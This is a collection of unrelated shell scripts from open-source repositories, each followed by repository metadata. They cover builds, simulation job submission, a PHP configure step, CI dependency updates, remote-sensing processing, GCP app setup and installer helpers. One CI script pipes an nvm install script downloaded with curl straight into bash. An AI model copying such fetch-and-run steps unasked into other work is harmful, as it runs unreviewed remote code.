cmake -DCMAKE_INSTALL_PREFIX=/home/travis/jsoncpp/install -DCMAKE_BUILD_TYPE=debug -DJSONCPP_WITH_PKGCONFIG_SUPPORT=OFF -G "Unix Makefiles" ../..
make
make install
|
idaholab/mytrim
|
.travis_bootstrap.sh
|
Shell
|
lgpl-2.1
| 288 |
#!/bin/bash
# in this file we will run a representative simulation
# user must edit USER PARAMETERS and USER SIMULATION PARAMETERS sections
##################### USER PARAMETERS ###########################
# ideally these parameters should be read in as parameters and then the script can do its work
COMPUTER_TYPE="laptop" #"laptop" is laptop, "compute-lung" is compute-lung, "arcus-a" is arcus-a and "arcus-b" is arcus-b
# non-batch specific variables
NUM_PROCS="1"
# batch specific variables
QUEUE_TYPE="devel" #"devel" is test and "" is just normal
JOB_NAME="arc_job"
WALLTIME="00:10:00"
NUM_NODES=1
NUM_PROCS_PER_NODE=1
######################################################################################################
########################## SETUP SOME VARIABLES AND PARAMETERS (AUTOMATIC) ########################
# set the code BASE_DIR and the OUTPUT_BASE_DIR
if [ "$COMPUTER_TYPE" = "laptop" ] ; then
BASE_DIR="/home/james/libmesh-git/libmesh/examples/dphil/coupled_navier_stokes"
OUTPUT_BASE_DIR="$BASE_DIR/results"
elif [ "$COMPUTER_TYPE" = "compute-lung" ] ; then
BASE_DIR="/home/james/libmesh-git/libmesh/examples/dphil/coupled_navier_stokes"
OUTPUT_BASE_DIR="$BASE_DIR/results"
elif [ "$COMPUTER_TYPE" = "arcus-a" ] ; then
BASE_DIR="/home/comp-respiratory-modelling/jmbewu/libmesh-git/libmesh/examples/dphil/coupled_navier_stokes"
OUTPUT_BASE_DIR="/home/comp-respiratory-modelling/jmbewu/data/results"
elif [ "$COMPUTER_TYPE" = "arcus-b" ] ; then
BASE_DIR="/home/comp-respiratory-modelling/jmbewu/libmesh-git-b/libmesh/examples/dphil/coupled_navier_stokes"
OUTPUT_BASE_DIR="/home/comp-respiratory-modelling/jmbewu/data/results"
else
echo "ERROR: invalid COMPUTER_TYPE specified."
fi
# variables for script
THIS_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
THIS_FILE="$0"
#############################################################################
############################ SIMULATION PARAMETERS ###########################
# simulation parameters
OUTPUT_DIR_RELATIVE="particle_deposition_august/fluid_testing/dt_testing/single_bifurcation/v_2000/dt_0.000025/"
OUTPUT_DIR="$OUTPUT_BASE_DIR/$OUTPUT_DIR_RELATIVE"
MESH_BASE_DIR="$BASE_DIR"
MESH_BASE_DIR="/home/james/meshes-git/dphil_meshes"
CONSTANT_VARIABLES="--use-petsc --solver_variable_names --solver_group_ns3d_u 0 --solver_group_ns3d_v 0 --solver_group_ns3d_w 0 --solver_group_ns3d_p 1 --solver_group_ns3d1d_u 0 --solver_group_ns3d1d_v 0 --solver_group_ns3d1d_p 0 --solver_group_ns3d1d_w 0 --solver_group_ns3d1d_Q 1 --solver_group_ns3d1d_P 1 --solver_group_ns3d1d_0_u 0 --solver_group_ns3d1d_0_v 0 --solver_group_ns3d1d_0_w 0 --solver_group_ns3d1d_0_p 1 --solver_system_names -log_summary"
SEMI_CONSTANT_VARIABLES="-geometry_type 4 -mesh_file $MESH_BASE_DIR/meshes_for_paper/multi_bifurcation_symmetric_diff_wall_bdy.msh -mesh_input_scaling_3d 0.02 -inflow_bdy_id 1011 -gmsh_diff_wall_bdy_id true -threed false -stokes true -unsteady 0 -sim_type 0 -reynolds_number_calculation false -prescribed_flow 0 -velocity_mag_3d 100.0e-2 -restart_folder $OUTPUT_BASE_DIR/particle_deposition_august/fluid_testing/dt_testing/single_bifurcation/v_2000/fluid_sim/ -particle_deposition 1 -viscosity 1.8e-5 -density 1.2 -write_interval 0.01 -use_centreline_data true -num_1d_trees 1 -input_1d_file $MESH_BASE_DIR/meshes_for_paper/multi_bifurcation_symmetric_diff_wall_bdy -radius_on_edge false -twod_oned_tree false -alveolated_1d_tree 0 -_read_1d_mesh false"
LIBMESH_OPTIONS="-input_file $THIS_DIR/navier.in -output_folder $OUTPUT_DIR/ $CONSTANT_VARIABLES $SEMI_CONSTANT_VARIABLES"
###########################################################################
####################### RUN PROGRAM ON NORMAL PC ##########################
if [ "$COMPUTER_TYPE" = "laptop" ] || [ "$COMPUTER_TYPE" = "compute-lung" ] ; then
$BASE_DIR/run_program.sh "$BASE_DIR" "$LIBMESH_OPTIONS" "$OUTPUT_DIR" "$NUM_PROCS"
#$BASE_DIR/example-opt $LIBMESH_OPTIONS 2>&1 | tee $OUTPUT_DIR/output.log
fi
###########################################################################
######################## RUN PROGRAM ON arcus-a ##########################
# - create the batch file (need to pass it some variables)
# - submit the batch file and return the job name/number
if [ "$COMPUTER_TYPE" = "arcus-a" ]; then
# generate file and make executable
$BASE_DIR/generate_pbs_file.sh "$JOB_NAME" "$WALLTIME" "$NUM_NODES" "$NUM_PROCS_PER_NODE" "$LIBMESH_OPTIONS" "$THIS_DIR" "$BASE_DIR"
chmod +x $THIS_DIR/job_script.sh
# submit job and record the job name/number
if [ "$QUEUE_TYPE" = "devel" ]; then
JOB_ID=$(qsub -q develq $THIS_DIR/job_script.sh)
else
JOB_ID=$(qsub $THIS_DIR/job_script.sh)
fi
# copy the batch file to the output directory
cp $THIS_DIR/job_script.sh $OUTPUT_DIR/
# copy the job id to the output directory
echo "$JOB_ID" > $OUTPUT_DIR/job_id.dat
echo "Submitted job $JOB_ID"
fi
#####################################################################
######################## RUN PROGRAM ON arcus-b ##########################
# - create the batch file (need to pass it some variables)
# - submit the batch file and return the job name/number
if [ "$COMPUTER_TYPE" = "arcus-b" ]; then
# generate file and make executable
$BASE_DIR/generate_slurm_file.sh "$JOB_NAME" "$WALLTIME" "$NUM_NODES" "$NUM_PROCS_PER_NODE" "$LIBMESH_OPTIONS" "$THIS_DIR" "$BASE_DIR"
chmod +x $THIS_DIR/job_script.sh
# submit job and record the job name/number (doesn't record job name/number on arcus-b)
if [ "$QUEUE_TYPE" = "devel" ]; then
JOB_ID=$(sbatch -p devel $THIS_DIR/job_script.sh)
else
JOB_ID=$(sbatch $THIS_DIR/job_script.sh)
fi
# copy the batch file to the output directory
cp $THIS_DIR/job_script.sh $OUTPUT_DIR/
# copy the job id to the output directory
echo "$JOB_ID" > $OUTPUT_DIR/job_id.dat
fi
#####################################################################
################# OUTPUT SOME HOUSEKEEPING DATA #####################
# copy this script to the output folder
cp $THIS_DIR/$THIS_FILE $OUTPUT_DIR/
# output the git version in a file
GIT_VERSION=$(git describe)
echo "$GIT_VERSION" > $OUTPUT_DIR/git_version.dat
# output the name of the computer and the directory it was run from in a file
COMPUTER_NAME=$(hostname)
echo "$COMPUTER_NAME" > $OUTPUT_DIR/computer_name.dat
echo "$THIS_DIR" > $OUTPUT_DIR/run_directory.dat
##############################################################
|
Mbewu/libmesh
|
examples/dphil/coupled_navier_stokes/libmesh_scripts_laptop/particle_deposition_august/fluid_testing/dt_testing/single_bifurcation/v_2000/dt_0.000025/test_script.sh
|
Shell
|
lgpl-2.1
| 6,486 |
#./configure \
#--with-config-file-path=/etc \
#--with-config-file-scan-dir=/etc/php.d \
#--with-pear \
#--with-curl \
#--with-gd \
#--with-jpeg-dir \
#--with-png-dir \
#--with-freetype-dir \
#--with-zlib-dir \
#--with-iconv \
#--with-mcrypt \
#--with-mhash \
#--with-pdo-mysql \
#--with-mysql-sock=/var/lib/mysql/mysql.sock \
#--with-openssl \
#--with-xsl \
#--with-recode \
#--enable-sockets \
#--enable-soap \
#--enable-mbstring \
#--enable-gd-native-ttf \
#--enable-zip \
#--enable-xml \
#--enable-bcmath \
#--enable-calendar \
#--enable-shmop \
#--enable-dba \
#--enable-wddx \
#--enable-sysvsem \
#--enable-sysvshm \
#--enable-sysvmsg \
#--enable-opcache \
#--enable-pcntl \
#--enable-maintainer-zts \
./configure \
--with-config-file-path=/tmp/php/etc \
--with-config-file-scan-dir=/tmp/php/etc/php.d \
--prefix=/tmp/php \
--enable-maintainer-zts \
--with-openssl \
--with-zlib \
--with-bz2 \
--enable-zip \
--with-pdo-mysql \
--with-gd \
--enable-mbstring \
--with-freetype-dir \
--enable-gd-native-ttf \
--with-jpeg-dir \
--with-png-dir \
|
nay-kang/Scripts
|
php_install.sh
|
Shell
|
lgpl-3.0
| 1,049 |
#!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd $DIR/../..
git reset --hard
git pull
composer install
|
tencent-th/test-tcplayer
|
scripts/webhook/deploy.sh
|
Shell
|
unlicense
| 128 |
#!/bin/bash
PKG=$NPMPKG
NPM=pnpm
if [ "$1" == "--full" ]; then
echo NPM OWNER/SEARCH/VIEW $PKG
echo " version published on npm: `$NPM view $PKG version`"
($NPM owner ls $PKG; \
$NPM search $PKG --no-description; \
$NPM view $PKG ) \
| perl -pne '$_ = qq{ $_}'
echo ""
echo $PKG dependencies
$NPM ls | perl -pne '$_ = qq{ $_}'
echo ""
else
echo NPM OWNER/SEARCH/VIEW SUBSET $PKG
echo " version published on npm: `$NPM view $PKG version`"
($NPM owner ls $PKG; \
$NPM search $PKG --no-description | egrep "$PKG|VERSION" ;
$NPM view $PKG | egrep "$PKG|latest:|published" ) \
| perl -pne '$_ = qq{ $_}'
fi
|
bcowgill/perljs
|
scripts/check-npm.sh
|
Shell
|
unlicense
| 634 |
# Human readable ll output
alias functions='{ echo "# vi:syntax=sh" ; declare -f ; } | vless'
|
LoveIsGrief/bash_env
|
aliases/functions.bash
|
Shell
|
unlicense
| 94 |
#!/bin/bash
doySTART=2000000
doyEND=2016000
#Go to Data Directory
cd ~/DATA
#Define number of (virtual) cores
ncores=`grep -c 'processor' /proc/cpuinfo`
echo "ncores=" $ncores
PRoot=~/dev/distRS/trunk
#Vegetation Fraction
prog_root=$PRoot/prog/prog_fc
cd $prog_root
make clean
make
cd ~/DATA
for (( doy = $doySTART ; doy <= $doyEND ; doy ++ ))
do
if [ $(expr $doy % 1000) -lt 366 ]
then
#echo "Vegetation Fraction" $doy
#count GeoTiff identified
c1=$(find -type f | grep ndvi_ | grep $doy | grep .tif | wc -l)
if [[ $c1 == 1 ]]
then
#NDVI file
#find GeoTiff
f1=$(find -type f | grep ndvi_ | grep $doy | grep .tif)
#Output filename
out=fc_$doy.tif
#does it already exist?
outno=$(find -type f | grep $out | wc -l)
#Define number of instances running
npid=$(echo "$(ps aux | grep fc\ | wc -l) - 1" | bc)
while [ $npid -ge $ncores ]
do
sleep 1
#Update number of instances running
npid=$(echo "$(ps aux | grep fc\ | wc -l) - 1" | bc)
#Update number of (virtual) cores (for heterogeneous systems)
ncores=`grep -c 'processor' /proc/cpuinfo`
done
echo -e "\e[01;34m"
echo "fc" $f1 $out
echo -e "\e[00m"
#process
$prog_root/fc $f1 $out &
fi
fi
done
#Transpiration Fraction
prog_root=$PRoot/prog/prog_Ta
cd $prog_root
make clean
make
cd ~/DATA
for (( doy = $doySTART ; doy <= $doyEND ; doy ++ ))
do
if [ $(expr $doy % 1000) -lt 366 ]
then
#echo "Transpiration Fraction" $doy
#count GeoTiff identified
c1=$(find -type f -name "eta_sebal_*.tif" | grep $doy | wc -l)
echo "c1=" $c1
if [[ $c1 == 1 ]]
then
#ETa file
#find GeoTiff
f1=$(find -type f -name "eta_sebal_*.tif" | grep $doy)
#count GeoTiff identified
c2_old=$c2
echo "c2_old=" $c2
c2=$(find -type f -name "fc_*.tif" | grep $doy | wc -l)
echo "c2=" $c2
if [[ $c2 == 1 ]]
then
#fc file
#find GeoTiff
f2=$(find -type f -name "fc_*.tif" | grep $doy)
fi
#Output filename
out=ta_$doy.tif
#does it already exist?
outno=$(find -type f | grep $out | wc -l)
#Define number of gdalwarp running
npid=$(echo "$(ps aux | grep ta\ | wc -l) - 1" | bc)
#echo "npid=" $npid
while [ $npid -ge $ncores ]
do
sleep 1
#Update number of tfr running
npid=$(echo "$(ps aux | grep ta\ | wc -l) - 1" | bc)
#Update number of (virtual) cores (for heterogeneous systems)
ncores=`grep -c 'processor' /proc/cpuinfo`
done
echo -e "\e[01;34m"
echo "ta" $f2 $f1 $out
echo -e "\e[00m"
#process
$prog_root/ta $f2 $f1 $out &
fi
fi
done
|
YannChemin/distRS
|
country/SriLanka/06_processing.sh
|
Shell
|
unlicense
| 2,632 |
#!/bin/bash
# Stupidly simple test script.
# Invoke with oktest.sh <script.py> <test>
# This code is trivial and therefore I release it into the public domain.
# See LICENSE
# Owain Kenway, 2015
if [ "$#" -ne 2 ]; then
echo "Please read code."
echo "Invoke with:"
echo " oktest.sh <script.py> <test>"
echo "Where <script.py> is your python program, and <test> maps to two files, <test>.in (sets up environment for the test) and <test>.good (expected output)."
echo "A file <test>.out will be written with your test's output."
else
code=$1
testname=$2
testin=$2.in
testout=$2.out
testgood=$2.good
date=`date +%s`
# Create a temporary file name that's probably unique.
temppy=.oktest.${1}.${2}.${date}.py
cat $testin > $temppy
cat $code >> $temppy
python -u $temppy > $testout
diff $testgood $testout
success=$?
if [ "$success" -eq 0 ]; then
echo "Test passed."
else
echo "Test failed."
fi
# Delete temporary script.
rm $temppy
fi
exit $success
|
owainkenwayucl/oktest
|
oktest.sh
|
Shell
|
unlicense
| 1,034 |
# Make pushd default to $HOME if no arguments given, much like cd
pushd() {
if (($#)) ; then
builtin pushd "$@"
else
builtin pushd -- "${HOME}"
fi
}
|
bitdagger/dotfiles
|
bash/bashrc.d/pushd.bash
|
Shell
|
unlicense
| 177 |
#!/usr/bin/env bash
pactl set-sink-port alsa_output.pci-0000_00_1f.3.analog-stereo analog-output-headphones &&
touch /tmp/headphones
|
pthorin/dotfiles
|
scripts/headphones.sh
|
Shell
|
unlicense
| 136 |
#!/bin/sh
set -e
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# use filter instead of exclude so missing patterns dont' throw errors
echo "rsync -av --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync -av --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identitiy
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
echo "/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements \"$1\""
/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements "$1"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current file
archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | rev)"
stripped=""
for arch in $archs; do
if ! [[ "${VALID_ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
}
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "$BUILT_PRODUCTS_DIR/Alamofire/Alamofire.framework"
install_framework "$BUILT_PRODUCTS_DIR/Gloss/Gloss.framework"
install_framework "$BUILT_PRODUCTS_DIR/SwiftDate/SwiftDate.framework"
install_framework "$BUILT_PRODUCTS_DIR/SwiftyDropbox/SwiftyDropbox.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "$BUILT_PRODUCTS_DIR/Alamofire/Alamofire.framework"
install_framework "$BUILT_PRODUCTS_DIR/Gloss/Gloss.framework"
install_framework "$BUILT_PRODUCTS_DIR/SwiftDate/SwiftDate.framework"
install_framework "$BUILT_PRODUCTS_DIR/SwiftyDropbox/SwiftyDropbox.framework"
fi
|
GitHubStuff/SwiftIntervals
|
Pods/Target Support Files/Pods-SwiftEvents/Pods-SwiftEvents-frameworks.sh
|
Shell
|
unlicense
| 4,045 |
#!/bin/bash
source ./ci/functions.sh
runBuild=false
echo "Reviewing changes that might affect the Gradle build..."
currentChangeSetAffectsDependencies
retval=$?
if [ "$retval" == 0 ]
then
echo "Found changes that affect project dependencies."
runBuild=true
else
echo "Changes do NOT affect project dependencies."
runBuild=false
fi
if [ "$runBuild" = false ]; then
exit 0
fi
echo -e "***********************************************"
echo -e "Build started at `date`"
echo -e "***********************************************"
echo -e "Installing renovate-bot...\n"
npm install npm@latest -g
npm -v
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
nvm install 12.5.0
node -v
npm install -g renovate
waitloop="while sleep 9m; do echo -e '\n=====[ Build is still running ]====='; done &"
eval $waitloop
renovate --labels=Bot [email protected] --git-fs=https --token=${GH_TOKEN} apereo/cas
echo -e "***************************************************************************************"
echo -e "Build finished at `date` with exit code $retVal"
echo -e "***************************************************************************************"
|
philliprower/cas
|
ci/update-dependencies.sh
|
Shell
|
apache-2.0
| 1,293 |
#!/usr/bin/env bash
DEVICE_NAME="pi3.lts.no"
echo "Updating packages:"
sudo apt-get update && sudo apt-get upgrade -y
echo "Installing new packages"
sudo apt-get install \
git \
vim \
--assume-yes
# openssh-server \
# curl \
# cron-apt \
echo "Cloning key repo"
git clone https://github.com/LTS-AS/key-management.git
echo "Generating SSH-keys"
ssh-keygen -t ed25519 -C DEVICE_NAME -f ~/.ssh/id_ed25519 -q -N ""
echo "Adding trusted SSH-keys"
cp ./key-management/ssh/authorized_keys ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
|
LTS-AS/IOT
|
01_deploy.sh
|
Shell
|
apache-2.0
| 565 |
#!/bin/bash
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
echo "Creating Datastore/App Engine instance"
gcloud app create --region "us-central"
echo "Creating bucket: gs://$DEVSHELL_PROJECT_ID-media"
gsutil mb gs://$DEVSHELL_PROJECT_ID-media
echo "Exporting GCLOUD_PROJECT and GCLOUD_BUCKET"
export GCLOUD_PROJECT=$DEVSHELL_PROJECT_ID
export GCLOUD_BUCKET=$DEVSHELL_PROJECT_ID-media
echo "Creating virtual environment"
mkdir ~/venvs
virtualenv -p python3 ~/venvs/developingapps
source ~/venvs/developingapps/bin/activate
echo "Installing Python libraries"
pip install --upgrade pip
pip install -r requirements.txt
echo "Creating Datastore entities"
python add_entities.py
echo "Creating quiz-account Service Account"
gcloud iam service-accounts create quiz-account --display-name "Quiz Account"
gcloud iam service-accounts keys create key.json --iam-account=quiz-account@$DEVSHELL_PROJECT_ID.iam.gserviceaccount.com
export GOOGLE_APPLICATION_CREDENTIALS=key.json
echo "Setting quiz-account IAM Role"
gcloud projects add-iam-policy-binding $DEVSHELL_PROJECT_ID --member serviceAccount:quiz-account@$DEVSHELL_PROJECT_ID.iam.gserviceaccount.com --role roles/owner
echo "Creating Cloud Pub/Sub topic"
gcloud pubsub topics create feedback
gcloud pubsub subscriptions create worker-subscription --topic feedback
echo "Creating Cloud Spanner Instance, Database, and Table"
gcloud spanner instances create quiz-instance --config=regional-us-central1 --description="Quiz instance" --nodes=1
gcloud spanner databases create quiz-database --instance quiz-instance --ddl "CREATE TABLE Feedback ( feedbackId STRING(100) NOT NULL, email STRING(100), quiz STRING(20), feedback STRING(MAX), rating INT64, score FLOAT64, timestamp INT64 ) PRIMARY KEY (feedbackId);"
echo "Creating Container Engine cluster"
gcloud container clusters create quiz-cluster --zone us-central1-a --scopes cloud-platform
gcloud container clusters get-credentials quiz-cluster --zone us-central1-a
echo "Building Containers"
gcloud container builds submit -t gcr.io/$DEVSHELL_PROJECT_ID/quiz-frontend ./frontend/
gcloud container builds submit -t gcr.io/$DEVSHELL_PROJECT_ID/quiz-backend ./backend/
echo "Deploying to Container Engine"
sed -i -e "s/\[GCLOUD_PROJECT\]/$DEVSHELL_PROJECT_ID/g" ./frontend-deployment.yaml
sed -i -e "s/\[GCLOUD_PROJECT\]/$DEVSHELL_PROJECT_ID/g" ./backend-deployment.yaml
kubectl create -f ./frontend-deployment.yaml
kubectl create -f ./backend-deployment.yaml
kubectl create -f ./frontend-service.yaml
echo "Project ID: $DEVSHELL_PROJECT_ID"
|
turbomanage/training-data-analyst
|
courses/developingapps/v1.2/python/kubernetesengine/end/prepare_environment.sh
|
Shell
|
apache-2.0
| 3,074 |
# vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4 fileencoding=utf-8 :
#
# Copyright 2014 by James Burlingame
# Apache 2.0 License
#
# installer-functions.sh
# common installer functions
TARBALLS_DIR=${TARBALLS_DIR:-"$TOP_DIR/tarballs"}
# get_tarball URL MD5 FILE
function get_tarball() {
local count=0
local ok=0
if [ "$max_tries"x = x ]
then
max_tries="2"
fi
# pwd
# echo "DEBUG: max_tries=$max_tries"
# echo 'DEBUG: get_tarball("'"$1"'", "'"$2"'", "'"$3"'")'
cd "$TARBALLS_DIR"
while [ "$count" -le "$max_tries" -a "$ok" -ne 1 ]
do
if [ -f "$3" ]
then
echo "$2"' *'"$3" | md5sum --check --status -
if [ "$?" -ne 0 ]
then
echo "$0: WARNING: $1 does not match md5. retrying."
rm -f "$3"
count=$((count + 1))
else
echo "$0: INFO: $3 Ok"
ok="1"
fi
else
wget --output-document="$3" "$1"
fi
done
if [ "$ok" -eq 0 ]
then
echo "$0: ERROR: Unable to download: $1" 1>&2
exit 1
fi
}
# makedir dirname [keep]
function makedir() {
local keep="$keep_existing"
if [ "$2"x = x ]
then
: #echo 'DEBUG: makedir("'"$1"'")'
else
#echo 'DEBUG: makedir("'"$1"', "'"$2"'")'
keep="$2"
fi
if [ ! -d "$1" ]
then
echo "$0: INFO: Creating directory $1"
mkdir -p "$1"
elif [ "$keep" -eq 0 ]
then
echo "$0: INFO: Removing existing $1"
rm -rf "$1"
mkdir -p "$1"
else
echo "$0: INFO: Using existing $1"
fi
}
# extract_tarball file dir [decompress-option]
function extract_tarball() {
local decompress="j"
if [ "$3"x != x ]
then
decompress="$3"
fi
# echo 'DEBUG: extract_tarball("'"$1"'", "'"$2"'", "'"$decompress"'")'
if [ -d "$2" ]
then
echo "$0: INFO: keeping existing $2"
else
echo tar -x"$decompress"f "$TARBALLS_DIR"/"$1"
tar -x"$decompress"f "$TARBALLS_DIR"/"$1"
fi
}
# configure_build srcdir builddir args
function configure_build() {
# echo 'DEBUG: configure_build("'"$1"'", "'"$2"'", '"$3"')'
if [ "$1"x = x -o ! -d "$TOP_DIR"/"$1" ]
then
echo "$0: ERROR: invalid source directory: $1" 1>&2
exit 1
fi
if [ "$2"x = x -o ! -d "$TOP_DIR"/"$2" ]
then
echo "$0: ERROR: invalid build directory: $2" 1>&2
exit 1
fi
cd "$TOP_DIR"/"$2"
echo "../$1/configure $3"
../"$1"/configure $3
if [ "$?" -ne 0 ]
then
echo "$0: ERROR: configure failed for $1." 1>&2
exit "$?"
fi
}
# make_install srcdir builddir makeargs
function make_install() {
# echo 'DEBUG: make_install("'"$1"'", "'"$2"'", "'"$3"'")'
if [ "$1"x = x -o ! -d "$TOP_DIR"/"$1" ]
then
echo "$0: ERROR: invalid source directory: $1" 1>&2
exit 1
fi
if [ "$2"x = x -o ! -d "$TOP_DIR"/"$2" ]
then
echo "$0: ERROR: invalid build directory: $2" 1>&2
exit 1
fi
cd "$TOP_DIR"/"$2"
if [ "$3"x != x ]
then
make $3
else
make
fi
if [ "$?" -ne 0 ]
then
echo "$0: ERROR: make failed for $1" 1>&2
exit "$?"
fi
make install
if [ "$?" -ne 0 ]
then
echo "$0: ERROR: make install failed for $1" 1>&2
exit "$?"
fi
}
# link_common link PACKAGE PREFIX [non-link-dirs]
function link_common()
{
local linkname="$1"
local package="$2"
local prefix="$3"
[ -d "/opt/$package" ] || mkdir -p "/opt/$package"
shift; shift; shift
if [ "$*"x != x ]
then
for name in $*
do
if [ ! -d "/opt/$package/$name" ]
then
if [ -e "/opt/$package/$name" ]
then
echo "$0: ERROR: directory expected: /opt/$package/$name" 1>&2
else
echo "$0: INFO: creating directory: /opt/$package/$name"
mkdir -p "/opt/$package/$name"
fi
fi
done
fi
ls "$prefix" | while read name
do
if [ ! -e "/opt/$package/$name" ]
then
(cd "/opt/$package"; rm -f "$name"; ln -s "$linkname"/"$name" "$name")
fi
done
}
# link_default PACKAGE PREFIX [non-link-dirs]
function link_default()
{
link_common ".default" $*
}
# link_active PACKAGE PREFIX [non-link-dirs]
function link_active()
{
link_common ".active" $*
}
# link_major PACKAGE PREFIX MAJOR [non-link-dirs]
function link_major()
{
local package="$1"
local prefix="$2"
local major="$3"
[ -d "/opt/$package/$major" ] || mkdir -p "/opt/$package/$major"
shift; shift; shift
if [ "$*"x != x ]
then
for name in $*
do
if [ ! -d "/opt/$package/$major/$name" ]
then
if [ -e "/opt/$package/$major/$name" ]
then
echo "$0: ERROR: directory expected: /opt/$package/$major/$name" 1>&2
else
echo "$0: INFO: creating directory: /opt/$package/$major/$name"
mkdir -p "/opt/$package/$major/$name"
fi
fi
done
fi
ls "$prefix" | while read name
do
if [ ! -e "/opt/$package/$major/$name" ]
then
(cd "/opt/$package/$major"; rm -f "$name"; ln -s .active/"$name" "$name")
fi
done
if [ ! -e "/opt/$package/$major/.active" ]
then
local relname=$(echo "$prefix" | sed -e "s:/opt/$package/.release/::")
(cd "/opt/$package/$major"; ln -s $(echo "$prefix" | sed -e "s:/opt/$package/:../:") .active)
echo "$0: INFO: setting release $relname as active for $major"
fi
}
# add_user name [uid [comment [home [shell]]]]
# add a daemon (no login) user
function add_user()
{
local username="$1"
local user_uid
local user_comment
local user_home
local user_shell
local check_uid=$(id -u "$username" 2> /dev/null)
local set_uid
if [ "$2"x = x ]
then
user_uid=""
set_uid=""
else
user_uid="$2"
set_uid="--system --uid=$2"
fi
if [ "$3"x = x ]
then
user_comment="$1"
else
user_comment="$3"
fi
if [ "$4"x = x ]
then
user_home="/var/empty/$username"
else
user_home="$4"
fi
if [ "$5"x = x ]
then
user_shell="/sbin/nologin"
else
user_shell="$5"
fi
if [ "$check_uid"x != x ]
then
if [ "$user_uid"x != x -a "$check_uid" != "$user_uid" ]
then
echo "$0: ERROR: user $username exists. uid $check_uid. expected $user_uid." 1>&2
else
echo "$0: INFO: user already exists: $username (uid $check_uid)"
fi
else
if [ ! -d "$user_home" ]
then
echo "$0: INFO: created home directory: $user_home"
mkdir -p "$user_home"
fi
useradd \
--no-create-home --user-group \
$set_uid \
--comment="$user_comment" \
--home-dir="$user_home" \
--shell="$user_shell" \
"$username"
echo "$0: INFO: created user: $username"
fi
}
|
samplx/installers
|
installer-functions.sh
|
Shell
|
apache-2.0
| 6,918 |
#!/bin/bash
# Copyright 2014 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO(jbeda): Provide a way to override project
# gcloud multiplexing for shared GCE/GKE tests.
KUBE_ROOT=$(dirname "${BASH_SOURCE}")/../..
